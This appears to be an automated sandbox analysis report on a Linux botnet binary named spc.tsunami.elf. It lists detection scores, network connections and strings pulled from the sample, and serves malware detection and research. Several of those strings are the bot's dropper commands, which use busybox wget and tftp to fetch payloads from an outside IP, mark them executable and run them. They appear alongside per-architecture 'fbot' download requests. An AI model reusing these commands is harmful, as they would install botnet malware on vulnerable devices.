Click to jump to signature section
Source: spc.tsunami.elf | ReversingLabs: Detection: 41% |
Source: global traffic | TCP traffic: 192.168.2.14:46540 -> 185.125.190.26:443 |
Source: unknown | TCP traffic detected without corresponding DNS query: 185.125.190.26 |
Source: unknown | TCP traffic detected without corresponding DNS query: 185.125.190.26 |
Source: spc.tsunami.elf | String found in binary or memory: Cdh5GZtVWYhl2cuFGdz9mLsNWdAIiZh5GZtVWYhl2cuFGdz9mLsNWdAI2Zz9Ca0BGa0FGI0lWYpxWYg4mZtFWa5xGI0FHIoRSZuBXZ0hHIhRmYlxHI1NmcgUXagMXcpVXZAQhttps://www.youtube.ru/watch?v=OGp9P6QvMjYmb0V2dy9yai5Waid3bwRWZulmLvNQbAA2LpJibi9Xd5NmY49FITRUVB5UTAkWZh5mYlx3czlGdtV2clhGbAw2cAgGbulXdzhGasVAbAAABCDEFGHIJKLMNOPQRSTUVWXYZabcdefghijklmnopqrstuvwxyz0123456789./. equals www.youtube.com (Youtube) |
Source: spc.tsunami.elf | String found in binary or memory: https://www.youtube.ru/watch?v=OGp9P6QvMjY equals www.youtube.com (Youtube) |
Source: spc.tsunami.elf | String found in binary or memory: http://156.228.232.89 |
Source: spc.tsunami.elf | String found in binary or memory: https://www.youtube.ru/watch?v=OGp9P6QvMjY |
Source: spc.tsunami.elf | String found in binary or memory: https://www.youtube.ru/watch?v=OGp9P6QvMjYmb0V2dy9yai5Waid3bwRWZulmLvNQbAA2LpJibi9Xd5NmY49FITRUVB5UT |
Source: unknown | Network traffic detected: HTTP traffic on port 46540 -> 443 |
Source: Initial sample | String containing 'busybox' found: /bin/busybox TSUNAMI |
Source: Initial sample | String containing 'busybox' found: /bin/busybox cat /bin/busybox |
Source: Initial sample | String containing 'busybox' found: /bin/busybox cp /bin/busybox retrieve && >retrieve && /bin/busybox chmod 777 retrieve && /bin/busybox cp /bin/busybox .t && >.t && /bin/busybox chmod 777 .t |
Source: Initial sample | String containing 'busybox' found: /bin/busybox KSLAKW; /bin/busybox wget; /bin/busybox tftp; /bin/busybox echo |
Source: Initial sample | String containing 'busybox' found: pdlbwairmoheqc18k5fgstv4jn072u63arm5arm@72bpdgbAAgOAA2cyVmbtFQZAAndkJndAMXYzN2dy9AZAA2YvNWd05iOhBHcsBXZgQmb09GIvZWdk5gPAAAJAAwIAAnYzVWevJAeAAXbsVGdtk2YsFAbAAGasVAcAAmbvNnclJ3YAQnbhZGbklWYslWZAQWZp5WZAQncvJgcAA2bk9nYllmYkFURGx2dldDdgoXYwBGb0VGIv5CdmB3buVAZAAGd0ZDcgoXYwBGb0VGIv5CdmB3buVAZAAURIN0TPRkTAUenablesystemshellshlinuxshell/bin/busybox TSUNAMI/bin/busybox cat /bin/busybox |
Source: Initial sample | String containing 'busybox' found: >t && cd && >retrieve; >.t/bin/busybox cp /bin/busybox retrieve && >retrieve && /bin/busybox chmod 777 retrieve && /bin/busybox cp /bin/busybox .t && >.t && /bin/busybox chmod 777 .t |
Source: Initial sample | String containing 'busybox' found: /bin/busybox wget http:// |
Source: Initial sample | String containing 'busybox' found: -O -> .t; /bin/busybox chmod 777 .t; ./.t |
Source: Initial sample | String containing 'busybox' found: /bin/busybox tftp -r |
Source: Initial sample | String containing 'busybox' found: ; /bin/busybox chmod 777 .t; ./.t |
Source: Initial sample | String containing 'busybox' found: /bin/busybox echo -en ' |
Source: Initial sample | String containing 'busybox' found: retrieve && /bin/busybox echo -en '\x45\x43\x48\x4f\x44\x4f\x4e\x45' |
Source: Initial sample | String containing 'busybox' found: ELFarmsparci686m68kpowerpcsuperhx86_64mipselmips/bin/busybox wget http://156.228.232.89 -O -> .t; /bin/busybox chmod 777 .t; ./.t/bin/busybox tftp -r -l .t -g ; /bin/busybox chmod 777 .t; ./.t\x%02x/bin/busybox echo -en '' >> retrieve && /bin/busybox echo -en '\x45\x43\x48\x4f\x44\x4f\x4e\x45'./retrieve > .t && ./.t; >retrieve && >.t |
Source: Initial sample | Potential command found: GET /fbot.arm5 HTTP/1.0 |
Source: Initial sample | Potential command found: GET /fbot.arm7 HTTP/1.0 |
Source: Initial sample | Potential command found: GET /fbot.x86 HTTP/1.0 |
Source: Initial sample | Potential command found: GET /fbot.mips HTTP/1.0 |
Source: Initial sample | Potential command found: GET /fbot.mipsel HTTP/1.0 |
Source: Initial sample | Potential command found: GET /fbot.powerpc HTTP/1.0 |
Source: Initial sample | Potential command found: GET /fbot.sparc HTTP/1.0 |
Source: Initial sample | Potential command found: GET /fbot.sh4 HTTP/1.0 |
Source: ELF static info symbol of initial sample | .symtab present: no |
Source: classification engine | Classification label: mal48.linELF@0/0@0/0 |
Source: /tmp/spc.tsunami.elf (PID: 5483) | Queries kernel information via 'uname': | Jump to behavior |
Source: spc.tsunami.elf, 5483.1.0000561de77d1000.0000561de7836000.rw-.sdmp | Binary or memory string: /etc/qemu-binfmt/sparc |
Source: spc.tsunami.elf, 5483.1.0000561de77d1000.0000561de7836000.rw-.sdmp | Binary or memory string: V!/etc/qemu-binfmt/sparc |
Source: spc.tsunami.elf, 5483.1.00007ffd1700d000.00007ffd1702e000.rw-.sdmp | Binary or memory string: x86_64/usr/bin/qemu-sparc/tmp/spc.tsunami.elfSUDO_USER=saturninoPATH=/usr/local/sbin:/usr/local/bin:/usr/sbin:/usr/bin:/sbin:/bin:/snap/binDISPLAY=:1.0XAUTHORITY=/run/user/1000/gdm/XauthoritySUDO_UID=1000TERM=xterm-256colorCOLORTERM=truecolorLOGNAME=rootUSER=rootLANG=en_US.UTF-8SUDO_COMMAND=/bin/bashHOME=/rootMAIL=/var/mail/rootSUDO_GID=1000SHELL=/bin/bash/tmp/spc.tsunami.elf |
Source: spc.tsunami.elf, 5483.1.00007ffd1700d000.00007ffd1702e000.rw-.sdmp | Binary or memory string: /usr/bin/qemu-sparc |